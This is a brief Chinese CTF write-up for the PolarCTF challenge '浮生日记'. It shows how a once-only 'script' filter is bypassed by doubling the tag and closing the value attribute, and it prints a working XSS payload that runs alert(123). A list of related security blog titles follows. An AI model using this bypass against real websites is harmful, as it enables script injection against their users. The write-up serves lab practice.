很明显是个XSS,尝试常规语句发现会过滤script
尝试双写
<scscriptript>alert(123)</scscriptript>
可以看到只过滤了一次<script>,但是还没有触发弹窗
我们看下源代码,发现需要对value进行闭合
那么payload如下:
"><scscriptript>alert(123)</scscriptript>
【PolarCTF】浮生日记
大方子2026-01-24 9:25
相关推荐
千枫s1 天前
电脑vm虚拟机kali linux安装shannon数字供应链安全产品选型1 天前
AI造“虾”易,治理难?悬镜多模态 SCA 技术破局 AI 数字供应链治理困局!网络安全许木1 天前
自学渗透测试第12天(渗透测试流程与DVWA部署)聊点儿技术1 天前
IP风险评分80分是怎么算出来的?从权重分配到计算逻辑vortex51 天前
SOAP 协议中的 XML 外部实体注入(XXE)漏洞一名优秀的码农1 天前
vulhub系列-64-Cereal: 1(超详细)一名优秀的码农1 天前
vulhub系列-66-Hms?: 1(超详细)CHICX12291 天前
5.SQL 注入之高权限注入(下):文件读写 + 写 Shell,从数据库权限到服务器控制权Sombra_Olivia1 天前
Vulhub 中的 bash CVE-2014-6271CHICX12291 天前
6.SQL 注入之基础防御:从魔术引号到类型校验,彻底封堵注入漏洞